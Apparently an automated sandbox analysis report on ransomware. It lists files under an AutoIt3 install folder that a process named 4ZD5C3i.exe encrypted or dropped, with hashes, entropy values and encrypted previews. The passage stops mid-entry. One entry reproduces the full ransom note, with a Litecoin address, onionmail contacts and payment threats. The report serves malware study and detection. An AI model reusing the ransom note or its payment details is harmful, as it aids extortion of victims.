                                                                                                                                                                                                                                                SHA-512:A2337B75843F6AC16C715415401880EFEFBFDA36340BA8D4720234682E4212A30BB6E3FF5E10AB8BF8012F0032D38315232ED4F7247D24ACDE0E265D7B8DD7E6
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.6..P.E.k.j..nm...=..|....d.U.......C.&I..U..LY................<...ge....j.._.u.....G.A..L!.c!.{...SX..RW..x..97.d...P......C&q...l4r?.0B.C8.<..+........T...B..=....6..Y.=tX......2nI...7b...5FDM.......i2.K.>...B..G..d.I.\(...e..\.s.....,I...&.R...#Hj..v........2...+w.)..M...m0.!... .L..S....}.z...C...o..r....]/.(..P.#b.....[+|h..Pm...$J...4P..l.O.:n..6qA.........".....C......$.$.&""..g..6P.2...f.4..d..M..&....C...Pc..X.N.j.v.V....!.....`H..k..H0.2...r......4..o.yV:.............6N9.B......#H.U..=.......8..h.9...F..........Oay.3...R.d...j.0+..&-...0...jZ!m/e7.r.F..j.K.|&...C..G...7.=.B......8...9....Ik.']...*A..M....=L.J;.y.v.w..b.*u.d3CC..>[..... ....$..L+...........-/..,i..,..y.~.6...P$P..#;dq....".......Z2.J...|...zh.)d...Y.}....'t>.6.'s...q.....)..?+.4E.%...~u......f...I#.C...Sz...Q.%...-u.N9*c.!MQa8...t.R...?.....V..)....o..."z..}.#.G......`......%"!}...t.....Q.0....O....jb..y.H..u.......7....g.HS....r..F.`.\...!..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Aut2Exe\Icons\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):305760
                                                                                                                                                                                                                                                Entropy (8bit):7.999420162246661
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:6144:amQOoWoOSl+jLgMOMtlA9FxQMXdRxbka+cVWs0OnF2pFVh2oBou1H:XoWoOSlXMOglAXGMD9Vnn6B1H
                                                                                                                                                                                                                                                MD5:F6F9534CB070A9984032EC7308C9058B
                                                                                                                                                                                                                                                SHA1:B4CEC2816C7FA6D1383F1A8AA4936FE37EC378E4
                                                                                                                                                                                                                                                SHA-256:B29E511EB5E4F3074B4DCF37D913AD9665EA1772F0951B49200ABE2C8C5049F5
                                                                                                                                                                                                                                                SHA-512:3CAAD20423E9F610FB38279CFFC02A66ABF1069AA8F0F989EF5292E523C600B08F588B5DC4E19B976832C8E588ABB816308EF8045A7FFEBD95E10EBEC91F9EC7
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:. w....6..K...M..Fa}..66....GLX.^...L.G...r....p.~Wm.RW'.,.%m.(.-.-.!.>........A\.:s.6n.w%..b...Lu.. >..zQ@9.b...~A.r..Y..~c"....F...yuP.......~......2(...z<.ky..EL..ht.XoC..X7...2.9..........H=C....li{..m.R.W..2=.m..%B...G.N......_...O.^. g.!.....$.+_};M..G8..p[.X.....<...+5..V.Y].L..y''.`o5&~.h+.C........)/..p.L.....?vt..0(......+.,.O=....8.B.?".#.z+<.1...O\6..;...~^o..KA.(....|.........up......^.... %.......-P.7.......v..&_.N.J..Yl...n.h..l.+.Q..........A~......u...].S.1....d.. .. u.`O...|.z......OC...Y=...mv....r^.+.....?.%.....*:..b..^.@@Dj..X...a*LCxu..=Lp...x.a..pj.c.y3.0..}.C7..F._z.+U.[....'.dG..9{.1.L./.).Y.rgWO......d.G........\^|.nG...V.....Z..C.g.z2.QR.P....V.\..Z..~t.Y.mH+.r>mS9..{.w..NG..e.\.]d.$..LQ.y...-ZE.......j.G....2...Sq,Z.G]..=c.z.@..k.Nx......DE(Jm N...1d...nH.$.ke.V..U....=[F..Vzc++.`d.?.2...R...=....{.j.3....4..A.........7..R....X$.v...8.1Z...T.*.J.1L.T.....~.Z~.....j..E....z..OZz...^...*..km.....#j(..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1072312
                                                                                                                                                                                                                                                Entropy (8bit):7.042643318775987
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:IHCl6Rb6qu1PyC+NRLtpScpzbtT7pyOolKLp5stQ95IVxaNIz3j:SS6AqSPyC+NltpScpzbtvpJoM95sts5O
                                                                                                                                                                                                                                                MD5:D72005C8FC73E2332075DD19E654412B
                                                                                                                                                                                                                                                SHA1:C001476737F31EE9DD9DDF03AC71117BBD0A23AA
                                                                                                                                                                                                                                                SHA-256:06751D8282FF53C3AFB1DCD42514AEFCC0E7F417A5180E7A42D7AD658EBF3920
                                                                                                                                                                                                                                                SHA-512:98C60C886D9A4C3322AA6FD197FB11FCF84DEB9B8C0984B2295BCD3230128BFA6844B879EFF732EAB21358BFD5D24F4FF3E190A50E5B4F3E5C61F1E1B0478F5C
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....<....8q.U.... .0B.}u{q..*.=.?..)P.......@.`....U...[..C*iB.......|r.&v./......[....j..L..K.|^.......}*..%qZ]_.h&.4.T.Y#[...X.FI.F.'R;..c.[F1.....#.....8.U .}...%...D..J...Jo.D..:.E...q....c.....x.j.Hk......k..&..nM.~G.-.0...........I.Fkf....!..;...Fsv..HNj.V.ED........Zg(]9..]......._;-_L.B.<u....o.j..+L.?.C.....;....i.y.1j5.d.......S.8>..J.J....5..0s...O.....-yb=...5....o.g.'.Z......NQ*".Z.s...1y.:'K.M..+z9...^.:F..........H=o1c...K..tqU...*.+..0=....<.....%.>.Q.R..t.*..xO.=..M.Jd.\...t......,&<..X.5.`}.)..!..O....`.^.+...*\....e.N....@%'.@.7......9././..e.....#....0q4..c....P..K.....b.<..:.m.|./S *..W.._..tU$...Q.V^.G..T*{.a1..4C._..h..7.....7x.lC.n*~2......F..N....ZD..@q.......p...d!#.W....J/D..w.ZQ.>....h.u...=.*.C...5R.X8.s....e..5......LcU#[$Q.*....<.H..R.......].v.J..........r..V... d7dE.;...M.9;f.....W#U].?.L_s.D.....sJh..B..sg..9~pp.-..Qs.V.X.Q..On,Ynx{0....~...N....k...R;...:.0.... ..'.=....../u..'.g.B>f.......ZL.Q'....R

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX.chm

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):200994
                                                                                                                                                                                                                                                Entropy (8bit):7.998981159391042
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:6144:D2Oe5kERXQ5dLYgoe6dBO/ZBkPsJOC1cbn3tNrPX:BqkIXQLLsu3Rcb9NLX
                                                                                                                                                                                                                                                MD5:8448DCEC14DD0FE50CDE5FDA75145A87
                                                                                                                                                                                                                                                SHA1:5D09BF1E54A0D1617E94FF144040912400671F40
                                                                                                                                                                                                                                                SHA-256:D64E73F8D2B87AB773B02456474FC16625AC543710CAB777FBD7461435EE1906
                                                                                                                                                                                                                                                SHA-512:728F00299214EBC0E324C2DD4DB5F28B5049290D2FA23522CD06D8F4B805EE993A28AACEDA57E07A81CCFF044B070525DA8199BF7601B8E638F07D225D7E69B3
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..&UrY....'...n...C..;.+.......L./2^km/..G..`O.b......c...........19.sX.?....$k...b>..:...8...J.p...^u&...V.....6.q,^+..<.......Y ..._....C..1..M..X.l...8.s,...Z.}..x.*.U.(......G..v....E&..a..'.D(...=.....S....wI..S..8.j..A.6.......a.}{....Y..K.o.......NpO..u...6N..t.tqm.....&....Z:f.@.......,.3..eNb....U.../......"L...ZS.F.M..R.0.D.._.:n.]../..?nE.X.;@.*X..a$I.*...C0..|U..h4..;.2,.+B.NQ....n.7.]Ssh..*...I5.k.~.r.X..../S+.O](8ja.9#.y].(^...<.i...J~^.."...70HS.P.d.,.va.y.o.i.....V..k.`..y..M..y.6|......!........N..>...{.a..AD|z-6....Y.j.Qa.$g0...d._.@..Y..C_.......iz.Vz...c&.@.i..}..9+E...Ej.....#..&.q..!.6*$.....F.#.V...E..d.w..Y...2+6.H01<)C+.H..fk.k."..u....Q..:..H.."...ZH..j5......' Q.s..;Z.I..{.5...\.....s.d...w.h^N.q..(!..!.wg..X. .Z.|....H>..ka.V....)sZh Z@.mh.1.x...06r+...%R...OS....@.S,r.&.s..S.Q15.. ...}...WaI:...L.7b...s.-.Q..T.[.]...cM.......ns.D.*......u.o...;^e..0,.....m..O.{..PO.{f.{_y$8f....dKi....e.._...~..{..5'>.q..........

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX.psd1

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):34062
                                                                                                                                                                                                                                                Entropy (8bit):7.994031065331187
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:EeQFLrXffTsV6qlJ941d3Z6H7Oizml5CxklraySzF4B8GjiBf4rDn4zpzGbs8utX:CLbnTrgf23o85CxSSl54EzG48utX
                                                                                                                                                                                                                                                MD5:0245C3EAD73E5C8241C1DBEA6E7DE79C
                                                                                                                                                                                                                                                SHA1:4154868A2F899EF4465C647183024019D9CD029D
                                                                                                                                                                                                                                                SHA-256:54B3C349CCF23E869F61AF7C5EAC3DBEE37DDACC7FCA6A061265FF76BFBDCBBA
                                                                                                                                                                                                                                                SHA-512:EB885DA1A8B8730BDFD4DBC2C7CEA711AC44DFB9D8363C31897D4484572C3529FCCB88242F2144F2767186A40F08C846F7496B3DBC4BACAE9464BF02C7F97F51
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....n.BZ..h....4.*q....h...!.O/.A..M1..._F.X..!b....p..A=...k.!....s...pJ.2..)..N...>.......Y@...CA..J.$.S<>S..?..y.S...![....gv....(k...R..D.9.yz..V.q.....*]...u....s2..\.....:RP..F.J.V(F.cl..jd..zA...EI....Q'L.....JkZ.KY.%...`.........F.........?..[z....%./.|...|".L...*.,......1..x..XO....-/....JKJ...$.`.{6..B\0..P.Xwy.2...Ex.4..BP.....Z()]O....[..}.+..e.lA'..JH...>x..7.{y(.c}....z..At.I...=g1.9n..N..I3CWG....j........O&.]..... ..........}IF...5.c..u......Z...o$..T7.......&..,......N.F..;.[.].q@D....^)....73..U.....J..X.\...u.1....a.F9.?..m...#...@.1S2..^.s......GX...e.e.N......=./Il.4../.h.&`E.....Or....~.pf....,..4.........7...>.d...w.. ...{.x.!..^D...{....8...S8.dO.-nr..Kn.....d..Z.....b.@j..g.2..d......&..3YU..{Y...[...s.X.....&.G.z..Ee...p...nX....*.3q;b.......1...H..E.......e.q.....;..FQG.*..../....q..8.|.j.........i..!..%0.....(.m...VD.G.j%...${.....C.Nc.Vo.[.w\S..3...y..F,...Y..9..8.,..../E..Oq...Y.:B..j..i..3v..WA.+".u9..2) n./#

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.Assembly.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):44736
                                                                                                                                                                                                                                                Entropy (8bit):7.996164594668912
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:768:puQDdgstsStw1VLdfnNiNiKydFmtqcexHqvOpEciPear/xAw:hWsyVVxViNifdUFe5qkuHpj
                                                                                                                                                                                                                                                MD5:461B3719372167921392378576C85C4E
                                                                                                                                                                                                                                                SHA1:ADA3435A8C0962C58D4CE380BF1CF809C2471BAB
                                                                                                                                                                                                                                                SHA-256:7B919A29888C2518A8B4F55095B37A773C15449B112E41FFA453EAABD9E7ED57
                                                                                                                                                                                                                                                SHA-512:4265641FBB47C64271DA9E934209B10E8F3D455D0307DAC7F01AA2ACE5FC8AE4ECC0484F1637BCA091B65AE3B2CF5C4FEE1AAF6D5659AD8F6C2CAF3D47089388
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...P8.S.5.@.[k.}@p.. .V......x.1(...NZv7.....W.{....=.Q"D...m.x.}.....q..f.5.......^..O.pM%....@*.Y.J.....i...`d.z...>$Rl...`.Kq......y5...tr...^%.$........P..1:.i.....u_.%.5_H.....d..j.(*.:.u!.o..V1..9.d.I(\B.....kM.`mH..o...iu.#..........C>...<..[..;........wG.\^..R..9.%..i2.F.....q.<..@g.&-........<.(..Fs6.R.!.=....,.u&.$..X..&t4&1d..qB.i..l....e...i5*E.4.vf$DbE".)n>n...6f.V.../.....8...v.<...:.{.t.b...O8a.".W!..-.ot.k......rR.x..(.[U.[.*....8..."...J..\...4..W..z.-..)"..f../ip.R9...z.A....t._..._..E....}1...Z..P..,..<..$T[..RQe'N....A.h.#^....@.6xud.{.....%.d..T..}.Q.I-.a..>A...3G.F...^...yO...s..{e.a....\....B"..G_...N.@5`...u....-.w.D.t.6^........r;......kB..R.B."1....O.....|..J.!...r.Nx.pm......Q"..B~............l5..A.....|A.#f.....8..HDThG.onx.SE.[.v...J....+. ..{..a....|^...+.5.. j....y"f....,5oC@.<..-.;.~....F..%...8QO.2..l....T...Q...P.gH...9.Y..r.TK..G.[0....Kq1...+0.Da}...E$..B...j..z...'..8.O.I=..7Z.<........"....3

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.Assembly.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):50126
                                                                                                                                                                                                                                                Entropy (8bit):7.996620174185485
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:768:juRbugaSHsiB0anEkCZCnjvcA1Y43EdwuEIxB45GFIct4VuYznMoqrmIycsaoi:q9laSVnqgcAYdPTxB45SZmXqV
                                                                                                                                                                                                                                                MD5:D9E3861CDE14D73BE537EEEAEE5F7AF9
                                                                                                                                                                                                                                                SHA1:6B62A0C5F044227A4D74685F74C50539CB2E9D78
                                                                                                                                                                                                                                                SHA-256:9F66E6BDCB2454D5DFF1640B4FFBEC14AD9AD013CD1C7257AF1C7659F4E1F405
                                                                                                                                                                                                                                                SHA-512:AF77C50280DA092CA0DE505A5003D10DF038A8CC5498D2AB623C61C558788704B5E7FFDE7A2B0D04EA8C87B83C1AFB7E423F0956ABCD41DD3FA6F9B7E123A585
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:|...... N......w.K..........1.h..-.O..c9h.Zd0..9.$....:.O.X.b^l....xWv./.WS...|.......Nx.....f......+..b.&......6.#.-cS...1...@P>#B..... .br+.MS..N..b.....B"drN...1.(......rE..A.r..Hd.F..k.W.8...Zi..!.K.#.)............r|N.,p....7N...*:..p.."FoP......n...M3|..n..5..*...Z<3*......4a..~.`!N.5G.cq...W..E....?..........\..O.;._....b:b...Kg_A+,.=..Ql....Y_..W...!9..nR..YOw.O.....^r@d.v..R.}(z..|t.l3%...Z..s.......v}t.T:G....s=..l..T.v...lq....._^.~nLoVlf\....t../.2WO.0..8U.#.,}.I......s....._h../*.n.yT.Km..l.YC..*...t{^..4...H..%..$.......\.,p+~....Ht|e.m..8j..8.......9o.9.`P-:.+....|Fu5.[,.M.mq.5..... M.$*...(..z4.Q...7K..]mI.,..C.v.D!cz.....p0L..T..i.D:..v..bOic[...E....2.K....k.?....{.x.4q..._aH..Fn.dd.ah..../.R..7.[D...Zh..?....D.z.......S....)4k.K..)."...$.tV....%.}.p"..\....w..:..<Jg5V...DN....{........y.FB#.,[..L.f'..m.z..D#...w.U...*.u..$S."4...3w......Y+.5....d1o..`.....s.$FY..<...9.9../Z...Q..OGl....`.J..#b.....,F..+..@..nO.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):53952
                                                                                                                                                                                                                                                Entropy (8bit):7.996613411693819
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:kmue3IhSCi6omSLYH6ncROxkiDghcWtLzGqO5xw:lue4lK5HcUy8lWR2Lw
                                                                                                                                                                                                                                                MD5:3B627CA27994A6DF800F5B5C6B0040B2
                                                                                                                                                                                                                                                SHA1:560FE09C440A81E0C7F11DBD8875C11EF80BBDF5
                                                                                                                                                                                                                                                SHA-256:4C7B7C2185A1C068EDB5DBB5406AAD28A58F6FCBCE2FB586AC4B27142F9EFFA8
                                                                                                                                                                                                                                                SHA-512:B5B5ECD6D3E6C5A39CE639F1D4758754A9A931CC5D6859BBCD00DECAD6EDD63B90AA3EE9A5963C3286FCF19D64775B9C207E9B9F1B54E3379C0119DDA5F42A2E
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:-A.f.C.V.w.I".QBX2b..L..'"^..&u.6 .....".U$C...>.._...2..|,....J...p.|77Z...X|...d..d|...DCu....v*..,Ck.....c.0.c. .......B......E...lIQ...V..9Fa~...]7.....l.Iza6....@.;.......9...".W..O+.+...V9.l.qH..e..7C..$.M.E2......A.....>.T.w..UT.Va......U......v.....J34o<.t*.p.1s.GEm.....T..<T..m...yr..d.&l..Y...d7.)...r..<W.........Lm.(.[..5.s.e..K..g.._....\IUB.6=...P..Z....C......O4..J......................YZ.g)>.t..}..+.y.Y.<..f['...g.h.k.g.Z....u^.....J..t..Q.'.`=..E[~.t.....n..#....Tq.A....M...i......|.X.gh..0D-\.'=...W$.]`%..Z...e.".9.".x1..#LI?...6g.h6<....\bN%..(...ZP.lw.bI....[..g,f...X.&....Y.a...q.pT.L.X5=o.l`g&.L@.zH....xk.'x.S....0s..A.&.>_..[.nO,T..q..d3...&.e..j.0.D3....~fH.o2^.Fd...'..VR<t...^...`;..O.d.arIF.x.o..Y'A ...H......M.]5&..H..l..W?jS.....5Xs.$v.8L.."....\.+.P^...F&.Q6....K ....+...<....>.............i.L...A.P..5HP...-.>%....m....z..{JD.+/.pbg..t......X.Pc}.V..!.{..o.b.h...%x9.t..~.....O*........d.=.KO.=..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):727248
                                                                                                                                                                                                                                                Entropy (8bit):7.544616853533055
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:axNsLJqtSgY2/xE/TfXA0F1ll7I4zXXRpR4uBkrdyW84lohaMMsmOgSvY1:arsLJgSbWxyTfXAGRCrsHbmjSg1
                                                                                                                                                                                                                                                MD5:D226E91CF45282617A46F2BAAAD24D12
                                                                                                                                                                                                                                                SHA1:ED03DF40CBC89ED90C4E142A033D8432C16AE3AE
                                                                                                                                                                                                                                                SHA-256:800E72CA0C9291E1844B938C007C3A684548BE787266AFCCAADC48AC9BF253B6
                                                                                                                                                                                                                                                SHA-512:82448CE5930E3C6DF567A5E59A6CD29F008A65852C842F02BA75C1D2DB8EAD02D5826BA6FDE3C3354883ABAC2AD055F68A95613B71DF9E89E34E853BDD9B2CB7
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.W&..`..6"..M..}r....,..2........v..z..!..A%....&.E.!},...0V$/....:.r.!.w.sN...N...Q....9..D..0Jx..@D(.....(....0:._LU.{..M.=^)..O..a[uCq$...4......eV..yr........._.|...wX^c.h$.b..p.t.~. ...'#......o.r%..o...9.J...6....t.)..Q7.7(.){"]..X.X$[..-Y.[+..H.@... ...%C2.F...^.T.% 7.C...&.>..b..UyV./$j.~8...wu..F?.!. ...r|.%...]......w....x.-'[.g+.W&.$...[a%.e.tb.(..\.g.f....c:m..;.\......h..'.....i..H.m......l.`.n..6s.....W......8..$.Z[(5.>,.K.X "$.Y...?...".0Bb..M...xC...u.|}`..\.........y^......).?.s.....)...;..z.....W..v.#M....n....C..E3..L.F...y@.&t..b..W. 1*c..rF`-.gD.@bi.xKo.O...gyIA..ds./........M6.NS...9(..w...*.~....$..=*..k9.{IIB..8.n..8q+....Z..6...8..kY39.){....n.!Y.$f._...yZ...>.l.......w.85ZZ....k./....K..".8A2@_.@...3N..T0t{.xA.u}# .\.`.&Z..g[..K.....(..g..Do......mTC.5...T....S.W.Y.aE.:...i.^?L'."h -*.q.d....hu#!Y...%/.-..>..xf z.j7....Ij..........&....p.R.5...@.....|....%...G.G..t%...6.....p.&.R1v.ky.Z...^.j.,..z@.....1.&(.>.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3_DLL.h

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):13601
                                                                                                                                                                                                                                                Entropy (8bit):7.985578175169819
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:j2jylkCJue5NjyMz2TYtIX0ziNDMNeNWcaUAr86d80:jqeZjy2oEiDwOaLNG0
                                                                                                                                                                                                                                                MD5:8A5B1624397BC7FE5F3D2261BBBCFBD1
                                                                                                                                                                                                                                                SHA1:5FA36CEC5E2382EBDD6061BF0B9BB2DB3346AF66
                                                                                                                                                                                                                                                SHA-256:9112B53E8BAC553B709AEAE0B37B9C42E6FDB202B2384CD387B574DC8B862CCF
                                                                                                                                                                                                                                                SHA-512:C3F1844D30C245F24E2AEFC73501121214D3F1204B0C6B2FFB9D195EB5626EC83605942D8A260521CB804CF2CEC1EE540DDAD36D08552F453B64C1E42311916A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.) .;....y......&B..rY..9_c.t..). ..R.j.f.-^..._.b}.\...D~].At.e.V..n.c..@.....#..po`:..I....T(...z....p.I`........q....<`.NC....#l..8.bO3..(.....(s..e^@.;U.....TG=A.l ...;...L..F.......o.\}sj.$.....G.t..........Ue....E....X..0$..\.77..%.@j..{_l........i<D..Qo....W.....x.1.k...zk..Ex.pQ..a.oeV.9|.JN...B.....d"......../..v.N]N6~....>..$.(V,cyN_^d!..B|f.Ob.O..J.8..e..z....P..8...xD.e|.7..x.k..2.:..Mg....*.X@e(.5.?.F.{.%.6...B.......l"..O... .[i@]vrJ.....c....?Ql..E..*).PJ..O^..,.l..-o.~N...........s#.P.x.......M.`.4...Q..}......1...4....Lr.J.-..G...A*-.z..9.e....k......5..z.u2F...`.7..|...x.c..l.....M.x.#..a......^el..J..kT.7..M?..`u..T._.\..I.?.v'..N.LJ..lS.....$kBl!g...p7.m....`..#m...p....r.jp.\.>...@.*..qx..'....6.Nq....y....50}-...KR!T-..w"y;wX..>..w.......w..W..."\...8HG...}9...R].......@.^~p..y...m:.LC.|.D.L0..:o.q.~@.4}h..Y..8S*.?a+.HM....R..~..Y....."....[..5...|.X...AFb.I0n.U..b.nY .VX..].].J.GV..G.sQ"...b:.&...n..J..bPh.KK_.H..K..x.LN^..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3_DLL.lib

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):29584
                                                                                                                                                                                                                                                Entropy (8bit):7.993125707151715
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:768:PltxTjQfY5pOi1bQ4J6SEIuGtVtgggXiZrCrotE:Pl3oE8i19ofGtLuilCrB
                                                                                                                                                                                                                                                MD5:5E0E1F2A8F1609D2B7A8EBF79AEA58A4
                                                                                                                                                                                                                                                SHA1:C25E45344E51BECBCD2F512DCA286ABDEC90FB25
                                                                                                                                                                                                                                                SHA-256:91249D0423459E2280BF80B96CF0FB1A7237027499D89B66E3542265099E6E89
                                                                                                                                                                                                                                                SHA-512:F213F0DAFF28723AB312567F883FB7069A86369CFCAA7C12C0F764FF9FA29938AF0CE964B8AB8583E2273A2A8A00AA259EFDDB22CBFADB3EB3082668BED64DBA
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.h....e...U.b_..?..*[.........U..@I. ..<AAqYRLE...B."........L.D...6..u....(...a....}.....+o...v.s........4U...V..>....c......>.....I.9..^.&D(pLW..;[.n..*....8:..Po.........3M....+.....f@.9.]...,...$\?..ye.C.+.p.....g..*>..?..Gh...<..N..g^..}..e1.K..QsB....$..)~.<...5...}.,. .S..*.N....oc`.. .K.,....V.a.n.(..q.~cj.#...z.B....h=.:4.!..K..q.G.1q....thc'I..4.B.N.C.@m_r.#.....8$,..!|..Q...s.0.G....r...8r..w...(..e.4..,...ew.. ..56p..2^6z...<...8.2...`fLm[.M...D...Vw.....Wv9...C......5.x.T..!/s...59.Y....N2;..+.z.#)r.m(+/.....a.IJ.N.s.bM^s..a,.l.#.^d..d.s..4...q....[....$D..1...|.bI..(S..W...0..%@.........."ige..`.}....R..l..W.yV6.SG,........`..........Jf..@..>).S5..U/.l.Q..1.......VGo.Zy..?.B..Z....I.t....%..+...._.b ..|H...@..+< .m.0.V.....)T.Z.&.....n.R.0=......XA&,Y>L.QL.b..`....Hs...T[B.cPWz..yH)..z.H...Er..sv&..,.8lA.V...Qq......N|..c.S.....s.....s}..~.!..nG...s.W..;J=%*.8..n.....6..O..I.............@/.TC....p.u...F....b.=LY.M...,.....

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3_x64.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
